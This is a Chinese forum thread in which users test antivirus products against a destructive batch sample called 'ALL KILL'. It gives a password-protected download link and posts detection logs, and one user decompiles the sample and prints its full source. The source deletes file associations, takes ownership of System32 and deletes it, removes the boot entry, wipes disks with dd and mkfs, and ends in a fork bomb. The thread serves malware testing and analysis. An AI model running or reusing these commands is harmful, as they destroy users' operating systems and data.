破坏类程序 1x

压缩的时空

B站刷到的，提权删文件【经典删文件】

https://xazxu.lanzouu.com/i5fGA3jemqdi
密码:kill

Xopii

BAT/BadJoke.ABU 特洛伊木马

WGC_ZY

ESSP:
2/28/2026 1:53:27 PM;Real-time file system protection;file;C:\Users\Zhang\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_002ab9;BAT/BadJoke.ABU trojan;deleted

ababababab

360解压杀allkillin.exe

xiaobaobao20

红伞
卡巴运行一半触发pdm结果还是miss

YYT2013

仍旧无意义样本一个经典bat to exe打包
经典删文件但还是测试吧
火绒Miss:

动态没有测试的必要

fsp（小红伞）kill

最后还是象征性的逆向一下吧
打开bat To Exe Converter
菜单中的工具 点Exe to bat
然后把三个文件扔过去获得代码，最后in 文件夹中的pe.exe无法逆向，别急我们看代码
ALL KILL.bat里面的代码是

1. [url=home.php?mod=space&uid=331734]@echo[/url] off
   
2. taskkill /f /im explorer.exe
   
3. cd in\
   
4. pe -U:T allkillin.exe
   
5. exit

复制代码

第二行结束桌面的进程然后第四行这个命令我们可以推断这个就是Nsudo，直接打开一下

可以证实了我的猜想是正确的
接下来看看allkillin的代码

1. @echo off
   
2. if "%1"=="h" goto begin
   
3. start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
   
4. :begin
   
5. echo WScript.Quit MsgBox("作者申明：" ^& vbCrLf ^& "这是一个电脑病毒，你确定要运行吗？运行后作者不负任何法律责任！！！" ^& vbCrLf ^& "这个程序会将你的系统破坏，是你的系统无法正常启动！！！", 4+48, "ALL KILL") > %temp%\allkill1.vbs
   
6. cscript //nologo %temp%\allkill1.vbs
   
7. if errorlevel 7 start explorer & exit
   
8. echo WScript.Quit MsgBox("操作不可撤销！" ^& vbCrLf ^& "确定要执行吗？（作者：bilibili xazxu）", 4+48, "ALL KILL") > %temp%\allkill2.vbs
   
9. cscript //nologo %temp%\allkill2.vbs
   
10. if errorlevel 7 start explorer & exit
    
11. del %temp%\allkill1.vbs
    
12. del %temp%\allkill2.vbs
    
13. reg delete HKCR/.exe /f
    
14. reg delete HKCR/.dll /f
    
15. ipconfig /release_all
    
16. cd \Windows\System32
    
17. takeown /f * /d y
    
18. takeown /r /f * /d y
    
19. icacls * /grant %userdomain%\%username%:F
    
20. icacls * /grant %userdomain%\%username%:F /t
    
21. del * /f /s /q
    
22. Ren *.* *.ALL KILL
    
23. dd if=/dev/zero of=/dev/sda
    
24. bcdedit /delete {current}
    
25. mkfs.ext4 /dev/sda1
    
26. echo "message" > /dev/sda
    
27. start explorer.exe
    
28. %0 | %0

复制代码

先是把注册表乱删一通然后把系统文件删了一下
最后的代码真是来搞笑的， ren 命令有用吗？改个后缀格式！
然后

1. mkfs.ext4 /dev/sda1
   
2. echo "message" > /dev/sda

复制代码

你以为这个Linux呢！最后的这个 %0|%0
营销号的代码都能在这里看到，这个作者实在是个人才！
总结：污染网络的一个文件

叫啥好也

Windows Defender kill 3

blackmonster233

BD阻止下载

浦北光

KES扫描miss

Nocria

IKARUS

1. Date and Time:       2026/2/28 18:45:04
   
2. File Name:           [危险文件]ALL KILL电脑病毒.zip.qbm
   
3. Original Path:       C:\Users\promi\Downloads
   
4. File Size:           181258 b
   
5. File Size:           177.01 kB
   
6. Detection Name:      Trojan.Agent
   
7. Detection-ID:        5226504
   
8. Status:              Missing
   
9. Found with VDB:      109024
   
10. Found with T3        6.4.12

复制代码

EMSISOFT